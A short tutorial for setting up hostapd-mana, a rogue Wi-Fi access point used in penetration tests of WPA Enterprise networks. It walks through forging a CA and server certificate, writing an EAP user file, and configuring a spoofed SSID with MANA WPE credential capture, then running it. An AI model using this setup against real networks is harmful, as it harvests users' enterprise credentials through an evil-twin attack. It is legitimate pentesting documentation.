# hostapd-mana

[hostapd-mana](https://github.com/sensepost/hostapd-mana) is a rogue access point tool built on hostapd. It is great for pentesting WPA Enterprise networks.

## Create a working directory
Create a working directory and navigate to it:

```
mkdir -p ~/mana/certs
cd ~/mana/certs
```

## Generate certificates and keys

### Generate CA private key and certificate
```
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 3650 -out ca.pem \
    -subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=SomeDepartment/CN=ACME CO Name Root CA"
```

### Generate server private key and certificate
```
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
    -subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=IT Department/CN=toteslegitwifi.companyname.com"
```

### Sign the server certificate with our CA
```
openssl x509 -req -in server.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.pem -days 365 -sha256
```

### Generate DH parameters
```
openssl dhparam -out dhparam.pem 2048
```

## Create EAP user file
Create the EAP user configuration file:

```
echo '*		PEAP,TTLS,TLS,MD5,GTC' > hostapd.eap_user
echo '"t"     	TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP  "1234test"  [2]' >> hostapd.eap_user
```

## Configure hostapd.conf
This needs to be tuned for your specific environment:

```
interface=NAME-OF-YOUR-WIFI-INTERFACE
ssid=SSID-TO-SPOOF
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
auth_algs=3

# 802.1x configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user

# Certificate configuration
# ca_cert is the CA certificate generated above, not the server certificate
ca_cert=ca.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem

# MANA specific settings
enable_mana=1
mana_wpe=1
mana_eapsuccess=1
```

## Kill any interfering processes and configure the interface

```
sudo airmon-ng check kill

# Configure interface (replace wlx9cefd5faf852 with the interface name set in hostapd.conf)
sudo ip link set wlx9cefd5faf852 down
sudo iw dev wlx9cefd5faf852 set type monitor
sudo ip link set wlx9cefd5faf852 up

# Stop NetworkManager (optional but recommended)
sudo systemctl stop NetworkManager
```

## Run hostapd-mana
```
# hostapd.conf is the configuration file created above
sudo hostapd hostapd.conf
```

### Run with a log file
```
sudo hostapd/hostapd hostapd.conf | tee -a log.log
```
